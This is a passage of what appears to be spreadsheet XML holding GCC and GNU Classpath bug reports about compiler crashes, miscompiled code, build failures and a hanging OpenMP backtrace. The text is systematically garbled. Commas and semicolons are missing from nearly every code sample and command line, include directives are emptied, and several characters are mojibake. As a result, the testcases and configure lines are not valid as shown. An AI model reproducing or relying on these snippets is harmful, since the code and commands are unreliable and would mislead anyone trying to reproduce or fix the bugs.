bounds.c:17:8: warning: array subscript is above array bounds [-Warray-bounds]
bounds.c:19:8: warning: array subscript is above array bounds [-Warray-bounds]
bounds.c:20:8: warning: array subscript is above array bounds [-Warray-bounds]
$ gcc-snapshot -O2 -Warray-bounds -c bounds.c -DH=g
bounds.c: In function 't':
bounds.c:17:8: warning: array subscript is above array bounds [-Warray-bounds]
Note: line 17 is the first a[f(s)] = 0.</t>
  </si>
  <si>
    <t>GCC-19647</t>
  </si>
  <si>
    <t>inquire(delim=) returns garbage</t>
  </si>
  <si>
    <t>$ cat delim.f90
program main
  character(len=10) delim
  character(len=50) line
  open(10delim='quote')
  inquire(10delim=delim)
  print *delim
  if (delim .ne. 'quote') call abort
end program main
$ gfortran delim.f90
$ ./a.out
 @Ã·@Ã·@
Aborted
$ gfortran -v  gfortran -dumpmachine
Using built-in specs.
Configured with: ../gcc/configure --prefix=/home/ig25 --enable-languages=cf95
Thread model: posix
gcc version 4.0.0 20050124 (experimental)
i686-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-28132</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE instantiate_virtual_regs_in_insn when -fforce-addr -O1 used</t>
  </si>
  <si>
    <t>building spidermonkey-1.5 with -O1 -fforce-addr with gcc-4.1.1 and gcc ICEs:
jsmath.c: In function 'math_round':
jsmath.c:394: error: unrecognizable insn:
(insn 61 93 62 4 (parallel [
            (set (mem/i:DF (reg/f:SI 95) [0 S8 A32])
                (neg:DF (mem/i:DF (reg/f:SI 96) [0 S8 A32])))
            (use (const_int 0 [0x0]))
            (clobber (reg:CC 17 flags))
        ]) -1 (nil)
    (nil))
jsmath.c:394: internal compiler error: in instantiate_virtual_regs_in_insn at
function.c:1555
this sort of looks like PR23196 but that is fixed in my 4.1.1
verified on Gentoo and Debian</t>
  </si>
  <si>
    <t>GCC-22076</t>
  </si>
  <si>
    <t>Strange code for MMX register moves</t>
  </si>
  <si>
    <t>This testcase:
#include 
__m64 test() {
   __m64 a
   return a
}
results in quite strange code when compiled with '-O2 -mmmx':
test:
	pushl	%ebp
	movl	%esp %ebp
	subl	$8 %esp
	movl	%eax -8(%ebp)   &lt;&lt;&lt;&lt;
	movl	%edx -4(%ebp)   &lt;&lt;&lt;&lt;
	movq	-8(%ebp) %mm0
	leave
	ret
If xmm registers are used (change __m64 into __m128) asm code is OK.
It looks there are some problems with register costs from _.22.lreg:
Pass 0
  Register 58 costs: AD_REGS:13000 Q_REGS:13000 NON_Q_REGS:13000 
INDEX_REGS:13000 LEGACY_REGS:13000 GENERAL_REGS:13000 MMX_REGS:24000 
FLOAT_INT_REGS:30000 INT_SSE_REGS:30000 FLOAT_INT_SSE_REGS:30000 ALL_REGS:30000 
MEM:20000
  Register 58 pref GENERAL_REGS or none
Pass 1
  Register 58 costs: AD_REGS:13000 Q_REGS:13000 NON_Q_REGS:13000 
INDEX_REGS:13000 LEGACY_REGS:13000 GENERAL_REGS:13000 MMX_REGS:24000 
FLOAT_INT_REGS:30000 INT_SSE_REGS:30000 FLOAT_INT_SSE_REGS:30000 ALL_REGS:30000 
MEM:20000
...
(insn:HI 16 28 22 1 (set (reg/i:V2SI 29 mm0 [  ])
        (reg/v:V2SI 58 [ a ])) 768 {*movv2si_internal} (nil)
    (expr_list:REG_DEAD (reg/v:V2SI 58 [ a ])
        (nil)))
...
The instructions marked with '&lt;&lt;&lt;&lt;' are then produced by reload.</t>
  </si>
  <si>
    <t>GCC-46060</t>
  </si>
  <si>
    <t>[F03] procedure pointer component referenced without argument list</t>
  </si>
  <si>
    <t>Created attachment 22072
module test_1.f90 which is referenced in the bug report
Compiling the module below causes a segmentation fault.
gfortran -c test_1.f90
test_1.f90: In function â€˜test_subroutineâ€™:
test_1.f90:20:0: internal compiler error: Segmentation fault
the crash occurs in last week's 4.6 trunk and 4.5.
========
gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/usr/local/gfortran/libexec/gcc/x86_64-apple-darwin10.3.0/4.5.1/lto-wrapper
Target: x86_64-apple-darwin10.3.0
Configured with: ../gcc-4_5-branch/configure --prefix=/usr/local/gfortran --enable-languages=cc++fortran --with-gmp=/Users/fx/devel/gcc/ibin45/../irun45 --enable-bootstrap --with-included-gettext --with-arch=nocona --with-tune=generic
Thread model: posix
gcc version 4.5.1 20100506 (prerelease) (GCC) 
=========
/volumes/dev/gfortran-4.6-trunk/bin/gfortran -v
Using built-in specs.
COLLECT_GCC=/volumes/dev/gfortran-4.6-trunk/bin/gfortran
COLLECT_LTO_WRAPPER=/Volumes/dev/gfortran-4.6-trunk/bin/../libexec/gcc/x86_64-apple-darwin10/4.6.0/lto-wrapper
Target: x86_64-apple-darwin10
Configured with: ../gfortran-4.6-src/configure --prefix=/volumes/dev/gfortran-4.6-trunk --enable-languages=fortran --host=x86_64-apple-darwin10 --build=x86_64-apple-darwin10 --target=x86_64-apple-darwin10
Thread model: posix
gcc version 4.6.0 20101013 (experimental) (GCC)</t>
  </si>
  <si>
    <t>sjbespa</t>
  </si>
  <si>
    <t>CLASSPATH-23866</t>
  </si>
  <si>
    <t>JProgressBar handles orientation argument wrong</t>
  </si>
  <si>
    <t>The attached demo application displays 4 JProgressBar with the following styles:
a) horizontal bar w/o text
b) horizontal bar with text
c) vertical bar w/o text
d) vertical bar with text
Classpath fails to draw horizontal progress bars and on the vertical bars the
text should be vertical but is not.</t>
  </si>
  <si>
    <t>GCC-79256</t>
  </si>
  <si>
    <t>[7 Regression] FAIL: gcc.dg/vect/pr25413a.c execution test</t>
  </si>
  <si>
    <t>FAILs on x86_64 with -m32.</t>
  </si>
  <si>
    <t>GCC-46267</t>
  </si>
  <si>
    <t>strerror() is not necessarily thread-safe</t>
  </si>
  <si>
    <t>In libgfortran/io/unix.c (get_oserror) strerror() is called. However according to POSIX
http://www.opengroup.org/onlinepubs/9699919799/functions/strerror.html
The strerror() function need not be thread-safe.
Possible solutions
- On some targets such as Solaris 9 strerror() is thread-safe.
- On Windows there is apparently a thread-safe strerror_s() function.
- POSIX has the thread-safe strerror_r() function. Unfortunately it suffers from a few issues.
   1) The interface is a bit cumbersome the caller must allocate a buffer for the message and pass it in
   2) glibc has also another strerror_r() function with an incompatible interface. Thus one needs to do some macro trickery to use the POSIX version or then use the GNU version on glibc targets.
  In short it's a trainwreck. See e.g. http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=6223913  and https://www.securecoding.cert.org/confluence/display/seccode/CON33-C.+Avoid+race+conditions+when+using+library+functions
- POSIX 2008 has the strerror_l() function which is thread-safe and has a similar interface as strerror(). Using this if available is perhaps the simplest solution and should at least fix the issue on platforms which have this function.</t>
  </si>
  <si>
    <t>GCC-42319</t>
  </si>
  <si>
    <t>incomplete type char_traits if parallel mode is active</t>
  </si>
  <si>
    <t>Compiling the following one-liner
    #include 
(one can use #include  instead to avoid including from bits/)
with
    g++-trunk -std=c++0x -D_GLIBCXX_PARALLEL
produces several errors.
This was broken somewhere between
  gcc version 4.5.0 20091117 (experimental) (GCC) 
and
  gcc version 4.5.0 20091123 (experimental) (GCC)
Compile errors:
In file included from /opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/string:53:0
                 from /opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/functional_hash.h:39
                 from /opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/functional:58
                 from /opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/parallel/base.h:35
                 from /opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/parallel/algobase.h:40
                 from /opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/stl_algobase.h:1152
                 from /opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/char_traits.h:41
                 from char_traits-pmode-broken.cpp:2:
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h: In instantiation of â€˜std::basic_stringâ€™:
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h:2606:68:   instantiated from here
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h:111:48: error: invalid use of incomplete type â€˜struct std::char_traitsâ€™
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/stl_algobase.h:404:12: error: declaration of â€˜struct std::char_traitsâ€™
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h: In instantiation of â€˜std::basic_stringâ€™:
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h:2709:68:   instantiated from here
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h:111:48: error: invalid use of incomplete type â€˜struct std::char_traitsâ€™
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/stl_algobase.h:404:12: error: declaration of â€˜struct std::char_traitsâ€™
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h: In instantiation of â€˜std::basic_stringâ€™:
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/functional_hash.h:236:53:   instantiated from here
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h:111:48: error: invalid use of incomplete type â€˜struct std::char_traitsâ€™
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/stl_algobase.h:404:12: error: declaration of â€˜struct std::char_traitsâ€™
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h: In instantiation of â€˜std::basic_stringâ€™:
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/functional_hash.h:248:53:   instantiated from here
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/basic_string.h:111:48: error: invalid use of incomplete type â€˜struct std::char_traitsâ€™
/opt/software/x86_64/gcc-trunk/lib/gcc/x86_64-unknown-linux-gnu/4.5.0/../../../../include/c++/4.5.0/bits/stl_algobase.h:404:12: error: declaration of â€˜struct std::char_traitsâ€™
$ g++-trunk -v -std=c++0x
Using built-in specs.
COLLECT_GCC=/opt/software/x86_64/gcc-trunk/bin/g++-trunk
COLLECT_LTO_WRAPPER=/opt/software/x86_64/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.5.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/opt/software/x86_64/gcc-trunk --program-suffix=-trunk --enable-languages=cc++ --enable-checking
Thread model: posix
gcc version 4.5.0 20091206 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-61383</t>
  </si>
  <si>
    <t>[4.8/4.9/4.10 Regression] wrong code at -O2 and -O3 on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk (as well as gcc 4.8 and 4.9) miscompiles the following code on x86_64-linux at -O2 and -O3 in both 32-bit and 64-bit modes.
This is a regression from 4.7.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.10.0 20140601 (experimental) [trunk revision 211110] (GCC) 
$ 
$ gcc-trunk -Os small.c a.out
$ gcc-4.7.3 -O2 small.c a.out
$ 
$ gcc-trunk -O2 small.c a.out
Floating point exception (core dumped)
$ gcc-4.8.2 -O2 small.c a.out
Floating point exception (core dumped)
$ 
------------------------------
int a b = 1 c d e f g
int
fn1 ()
{
  int h
  for ()
    {
      g = b
      g = g ? 0 : 1 % g
      e = a + 1
      for ( d &lt; 1 d = e)
	{
	  h = f == 0 ? 0 : 1 % f
	  if (f &lt; 1)
	    c = 0
	  else if (h)
	    break
	}
      if (b)
	return 0
    }
}
int
main ()
{
  fn1 ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-47017</t>
  </si>
  <si>
    <t>[4.6 Regression] gnatlib ICE on sparc64-linux</t>
  </si>
  <si>
    <t>/home/guerby/build/./gcc/xgcc -B/home/guerby/build/./gcc/ -B/n/62/guerby/install-trunk-64/sparc64-unknown-linux-gnu/bin/ -B/n/62/guerby/install-trunk-64/sparc64-unknown-linux-gnu/lib/ -isystem /n/62/guerby/\
install-trunk-64/sparc64-unknown-linux-gnu/include -isystem /n/62/guerby/install-trunk-64/sparc64-unknown-linux-gnu/sys-include    -c -g -O2  -fPIC  -W -Wall -gnatpg   a-cdlili.adb -o a-cdlili.o
+===========================GNAT BUG DETECTED==============================+
| 4.6.0 20101218 (experimental) [trunk revision 168022] (sparc64-unknown-linux-gnu) |
| Storage_Error stack overflow (or erroneous memory access)                |
| Error detected at s-finroo.ads:53:4                                      |
compilation abandoned
make[7]: *** [a-cdlili.o] Error 1
make[7]: Leaving directory `/home/guerby/build/gcc/ada/rts'
make[6]: *** [gnatlib] Error 2
make[6]: Leaving directory `/home/guerby/build/gcc/ada'
make[5]: *** [gnatlib-shared-default] Error 2
make[5]: Leaving directory `/home/guerby/build/gcc/ada'
make[4]: *** [gnatlib-shared-dual] Error 2
make[4]: Leaving directory `/home/guerby/build/gcc/ada'
make[3]: *** [gnatlib-shared] Error 2
make[3]: Leaving directory `/home/guerby/build/gcc/ada'
make[2]: *** [gnatlib-shared] Error 2
make[2]: Leaving directory `/home/guerby/build/sparc64-unknown-linux-gnu/libada'
make[1]: *** [all-target-libada] Error 2
make[1]: Leaving directory `/home/guerby/build'
make: *** [bootstrap] Error 2
../trunk/configure --prefix=/n/62/guerby/install-trunk-64 --disable-werror --enable-languages=cfortranada --enable-__cxa_atexit --disable-nls --enable-threads=posix --with-mpfr=/opt/cfarm/mpfr-2.4.1-64 --\
with-gmp=/opt/cfarm/gmp-4.2.4-64 --with-mpc=/opt/cfarm/mpc-0.8-64
export CC=gcc -m64</t>
  </si>
  <si>
    <t>GCC-472</t>
  </si>
  <si>
    <t>gcj has segmentation faults</t>
  </si>
  <si>
    <t>Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux/2.96/specs
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux/2.96/../../../libgcj.spec
rename spec lib to liborig
rename spec startfile to startfileorig
gcc version 2.96 20000807 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux/2.96/jc1 /usr/src/Freenet/Core.java -fno-use-divide-subroutine -fasynchronous-exceptions -quiet -dumpbase Core.java -g1 -version -o Core.s
GNU Java version 2.96 20000807 (experimental) (i686-pc-linux) compiled by GNU C version 2.96 20000807 (experimental).
/usr/src/Freenet/Core.java:94: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux/2.96/specs
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux/2.96/../../../libgcj.spec
rename spec lib to liborig
rename spec startfile to startfileorig
gcc version 2.96 20000807 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux/2.96/jc1 /usr/src/Freenet/message/RequestCB.java -fno-use-divide-subroutine -fasynchronous-exceptions -quiet -dumpbase RequestCB.java -g1 -version -o RequestCB.s
GNU Java version 2.96 20000807 (experimental) (i686-pc-linux) compiled by GNU C version 2.96 20000807 (experimental).
/usr/src/Freenet/message/RequestCB.java: In class `Freenet.message.RequestCB$RequestRestarted':
/usr/src/Freenet/message/RequestCB.java: In method `received(Freenet.node.NodeFreenet.MessageMemory)':
/usr/src/Freenet/message/RequestCB.java:74: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux/2.96/specs
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux/2.96/../../../libgcj.spec
rename spec lib to liborig
rename spec startfile to startfileorig
gcc version 2.96 20000807 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux/2.96/jc1 /usr/src/Freenet/message/DataRequest.java -fno-use-divide-subroutine -fasynchronous-exceptions -quiet -dumpbase DataRequest.java -g1 -version -o DataRequest.s
GNU Java version 2.96 20000807 (experimental) (i686-pc-linux) compiled by GNU C version 2.96 20000807 (experimental).
/usr/src/Freenet/message/DataRequest.java: In class `Freenet.message.DataRequest$DataSent':
/usr/src/Freenet/message/DataRequest.java: In method `id()':
/usr/src/Freenet/message/DataRequest.java:117: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux/2.96/specs
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux/2.96/../../../libgcj.spec
rename spec lib to liborig
rename spec startfile to startfileorig
gcc version 2.96 20000807 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux/2.96/jc1 /usr/src/Freenet/message/DataSend.java -fno-use-divide-subroutine -fasynchronous-exceptions -quiet -dumpbase DataSend.java -g1 -version -o DataSend.s
GNU Java version 2.96 20000807 (experimental) (i686-pc-linux) compiled by GNU C version 2.96 20000807 (experimental).
/usr/src/Freenet/message/DataSend.java: In class `Freenet.message.DataSend$ReceivedData':
/usr/src/Freenet/message/DataSend.java: In method `id()':
/usr/src/Freenet/message/DataSend.java:272: Internal error: Segmentation fault.
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.96 20000807 (experimental)
Environment:
i686-pc-linux
How-To-Repeat:
see file</t>
  </si>
  <si>
    <t>j_duin</t>
  </si>
  <si>
    <t>GCC-61517</t>
  </si>
  <si>
    <t>[4.10 Regression] wrong code at -Os and above on x86_64-linux-gnu</t>
  </si>
  <si>
    <t>The current gcc trunk miscompiles the following code on x86_64-linux at -Os and above in both 32-bit and 64-bit modes.
This is a regression from 4.9.x. 
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/4.10.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 4.10.0 20140615 (experimental) [trunk revision 211685] (GCC) 
$ 
$ gcc-trunk -O1 small.c a.out
$ gcc-4.9.0 -Os small.c a.out
$ 
$ gcc-trunk -Os small.c
$ a.out
Aborted (core dumped)
$ 
--------------------------
int a b *c = 
unsigned short d
int
main ()
{
  unsigned int e = a
  *c = 1
  if (!b)
    {
      d = e
      *c = d | e
    }
  if (a != 0) 
    __builtin_abort () 
  return 0
}</t>
  </si>
  <si>
    <t>GCC-14602</t>
  </si>
  <si>
    <t>[4.0 Regression] libjava bootstrap failure on Tru64 UNIX V5.1B: ICE on gnu/regexp/MessagesBundle.properties</t>
  </si>
  <si>
    <t>Bootstrapping current mainline on Tru64 UNIX V5.1B fails:
/vol/gcc/obj/gcc-3.5.0-20040312/5.1b-gcc/gcc/gcj -B/vol/gcc/obj/gcc-3.5.0-20040312/5.1b-gcc/alpha-dec-osf5.1b/libjava/ -B/vol/gcc/obj/gcc-3.5.0-20040312/5.1b-gcc/gcc/ --encoding=UTF-8 -Wno-deprecated -fclasspath= -fbootclasspath=/vol/gcc/obj/gcc-3.5.0-20040312/5.1b-gcc/alpha-dec-osf5.1b/libjava -mieee -g -O2 -MD -MT gnu/regexp/MessagesBundle.properties.lo -MF gnu/regexp/MessagesBundle.properties.d -c -c --resource gnu/regexp/MessagesBundle.properties /vol/gnu/src/gcc/gcc-dist/libjava/gnu/regexp/MessagesBundle.properties  -o gnu/regexp/.libs/MessagesBundle.properties.o
/vol/gnu/src/gcc/gcc-dist/libjava/gnu/regexp/MessagesBundle.properties:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [gnu/regexp/MessagesBundle.properties.lo] Error 1
This happens even with
$ ./jc1 /vol/gnu/src/gcc/gcc-dist/libjava/gnu/regexp/MessagesBundle.properties -fcompile-resource=gnu/regexp/MessagesBundle.properties
/vol/gnu/src/gcc/gcc-dist/libjava/gnu/regexp/MessagesBundle.properties:0: internal compiler error: Segmentation fault
Unfortunately I cannot debug jc1 since gdb (both 6.0 and CVS gdb from
february) crash here too -(  dbx doesn't help because it cannot handle
stabs-in-ECOFF.
Environment:
System: OSF1 bartok V5.1 2650 alpha
Machine: alpha
host: alpha-dec-osf5.1b
build: alpha-dec-osf5.1b
target: alpha-dec-osf5.1b
configured with: /vol/gnu/src/gcc/gcc-dist/configure --prefix=/vol/gcc --with-local-prefix=/vol/gcc --disable-nls --host alpha-dec-osf5.1b --build alpha-dec-osf5.1b --target alpha-dec-osf5.1b
How-To-Repeat:
Bootstrap current mainline as above.</t>
  </si>
  <si>
    <t>GCC-67521</t>
  </si>
  <si>
    <t>ICE when OpenMP loop expressions mention the IV</t>
  </si>
  <si>
    <t>void
foo (int j)
{
  int i = 0
  #pragma omp parallel for simd
  for (i = (i  i &lt; 10 i = i + 2)
  i = 0
  #pragma omp parallel for simd
  for (i = 0 i &lt; (i  i = i + 2)
  i = 0
  #pragma omp parallel for simd
  for (i = 0 i &lt; 10 i = i + ((i &amp; j) + 2))
}
ICEs because the iterator is mentioned in the expressions.  Note if called with
j = 0 supposedly the expressions should be still loop invariant.</t>
  </si>
  <si>
    <t>GCC-2420</t>
  </si>
  <si>
    <t>Internal compiler error received compiling mkreiserfs.c</t>
  </si>
  <si>
    <t>Was attempting to compile reiserfs_utils-3.6.25-fsck-3.x.0b
and the compile died on the first module mkreiserfs.c.
The generated command to perform the compilation was:
cc -Wall -c -O2 -g -I/tmp/build-reiserfs-3.6.25-s390-1/reiserfs_utils-3.6.25-fsck-3.x.0b/utils/include -I/tmp/build-reiserfs-3.6.25-s390-1/reiserfs_utils-3.6.25-fsck-3.x.0b/utils/../../../include/linux -I- mkreiserfs.c
The output from the command was:
mkreiserfs.c: In function `make_root_block':
mkreiserfs.c:261: invalid lvalue in assignment
mkreiserfs.c:261: invalid lvalue in assignment
mkreiserfs.c:277: Internal compiler error in `emit_no_conflict_block' at optabs.c:2798
Please submit a full bug report.
See  for instructions.
make[2]: *** [mkreiserfs.o] Error 1
make[2]: Leaving directory `/tmp/build-reiserfs-3.6.25-s390-1/reiserfs_utils-3.6.25-fsck-3.x.0b/utils/mkreiserfs'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/tmp/build-reiserfs-3.6.25-s390-1/reiserfs_utils-3.6.25-fsck-3.x.0b/utils'
make: *** [all] Error 2
It fails consistently.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
Slackware-like Linux/390 on IBM mainframe.
How-To-Repeat:
Unpack the source code to /tmp
cd reiserfs_utils-3.6.25-fsck-3.x.0b/
make
That should do it (if you have an S/390).</t>
  </si>
  <si>
    <t>mark.post</t>
  </si>
  <si>
    <t>GCC-12166</t>
  </si>
  <si>
    <t>Profiled programs crash if PROFDIR is set</t>
  </si>
  <si>
    <t>Programs compiled with profiling (-pg) will crash on termination and not write 
any output profile data. This occurs when the environment variable PROFDIR is 
set.
This bug appears to have been spotted and a patch provided some time ago 
however the patch does not appear to be present in the 3.3 source tree. Here is 
a URL for the original patch which also contains a better description of the 
issue than I can manage:
http://gcc.gnu.org/ml/gcc-patches/1999-03n/msg00038.html</t>
  </si>
  <si>
    <t>sean.johnston</t>
  </si>
  <si>
    <t>GCC-13055</t>
  </si>
  <si>
    <t>jacks tests must detect gcc ICE</t>
  </si>
  <si>
    <t>Currently the jacks test suite doesn't detect a gcc ICE.
We are getting some spurious PASS results due to this.
Jacks will detect core dumps we could run with -dH (or whatever
it is).  This isn't perfect though.
A Jacks developer suggested a wrapper script which detects
and ICE and creates a file named core.  The jacks test driver
understands this.
Another approach would be to modify jacks to have a regexp to
compare against the compiler output so it can look for ICEs
directly.  It was unclear whether the jacks developers would
check this in.</t>
  </si>
  <si>
    <t>GCC-39588</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] internal compiler error: in trunc_int_for_mode at explow.c:55</t>
  </si>
  <si>
    <t># gcc -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.3.3/configure --prefix=/tmp/gcc433 --enable-languages=cc++
Thread model: posix
gcc version 4.3.3 (GCC)
with the following self-contained file buc.c
#define lit_from_int(in) ((in&lt;0)?(((-in)&lt;&lt;1)|1):(in&lt;&lt;1))
void init_clause(int* literalsint size int *lits)
{
  int i
  for(i=0 i &lt; size i++) {
    lits[i] = lit_from_int(literals[i])
  }
}
On a x86_64 host both gcc 4.3.1 (handmade compilation) gcc 4.3.2 (Fedora Core 10 package) and gcc 4.3.3 (handmade compilation) crash with -O3 optimization
# gcc -O3 -c bug.c 
bug.c: In function â€˜init_clauseâ€™:
bug.c:10: internal compiler error: in trunc_int_for_mode at explow.c:55
This bug doesn't occur on a i686 host (gcc 4.3.2). On a x86_64 host it doesn't  occur when -O2 is used with gcc 4.3.3 or when gcc 4.2.4 is used.</t>
  </si>
  <si>
    <t>olivier.roussel</t>
  </si>
  <si>
    <t>GCC-24687</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE after error</t>
  </si>
  <si>
    <t>testcase:
       typedef struct {
   }
   extern C++ {
  }
                                           extern C {
       template     struct __is_pod     {       enum  {    __value = (sizeof(__gnu_internal::__test_type(0))        != sizeof(__gnu_internal::__one))  }     }</t>
  </si>
  <si>
    <t>GCC-66640</t>
  </si>
  <si>
    <t>Symbolic (addr2line) backtrace handler sometimes does not terminate when using OpenMP</t>
  </si>
  <si>
    <t>Symbolic backtraces seem to be implemented by a fork()/execve() to addr2line.
when this is done from within an OpenMP parallel region the fork()ed
addr2line somehow never terminates and the program hangs forever in the
backtrace.
Small example program that triggers a divide-by-zero:
#######################################################
program test
  use intrinsic :: iso_c_binding
  real(kind=C_DOUBLE) :: a
  integer i
  !$omp parallel private(a)
  a = 2.0_C_DOUBLE
  do i = 2 0 -1
    a = a / i
  end do
  write(**) a
  !$omp end parallel
end program
#######################################################
Compile with
  gfortran -g -fopenmp test.F90 -ffpe-trap=zero
With one thread it produces a backtrace and terminates as expected:
#######################################################
$&gt; OMP_NUM_THREADS=1 ./test
Program received signal SIGFPE: Floating-point exception - erroneous arithmetic operation.
Backtrace for this error:
#0  0x7F76637514B7
#1  0x7F76637506B0
#2  0x7F766282D43F
#3  0x400A6D in MAIN__._omp_fn.0 at test.F90:9
#4  0x400985 in test at test.F90:6
[1]    17635 floating point exception  OMP_NUM_THREADS=1 ./test
$&gt;
#######################################################
While with more than one thread it _sometimes_ does not terminate
(here enforced by calling it as often as it takes in the while true loop):
#######################################################
$&gt; while true do clear OMP_NUM_THREADS=2 ./test done
^L
Program received signal SIGFPE: Floating-point exception - erroneous arithmetic operation.
Backtrace for this error:
Program received signal SIGFPE: Floating-point exception - erroneous arithmetic operation.
Backtrace for this error:
#0  0x7F7B3D2834B7
#1  0x7F7B3D2826B0
#2  0x7F7B3C35F43F
#0  0x7F7B3D2834B7
#1  0x7F7B3D2826B0
#3  0x400A6D in MAIN__._omp_fn.0 at test.F90:9
#2  0x7F7B3C35F43F
#4  0x7F7B3CD4FFAD
#5  0x7F7B3C6D4483
#6  0x7F7B3C412A4C
#3  0x400A6D in MAIN__._omp_fn.0 at test.F90:9
#7  0xFFFFFFFFFFFFFFFF
#4  0x400985 in test at test.F90:6
[Hangs here]
#######################################################
This might also be interesting:
#######################################################
$&gt; ps uf | grep -n addr2line\|test
12:lorenz   18346  0.0  0.0  29532  1392 pts/4    Sl+  15:10   0:00  \_ ./test
13:lorenz   18348  0.0  0.0  13832  2000 pts/4    S+   15:10   0:00      \_ /usr/bin/addr2line -e /home/lorenz/dev/addr2line_bug/test -f -s -C
14:lorenz   18349  0.0  0.0  13832  2048 pts/4    S+   15:10   0:00      \_ /usr/bin/addr2line -e /home/lorenz/dev/addr2line_bug/test -f -s -C
$&gt;
$&gt; gdb -p 18348 -ex bt -ex detach -ex q 2&gt;/dev/null | tail -n 13 
#0  0x00007f04bb171580 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:81
#1  0x00007f04bb109f00 in _IO_new_file_underflow (fp=0x7f04bb4324c0 ) at fileops.c:580
#2  0x00007f04bb10ad6e in __GI__IO_default_uflow (fp=0x7f04bb4324c0 ) at genops.c:426
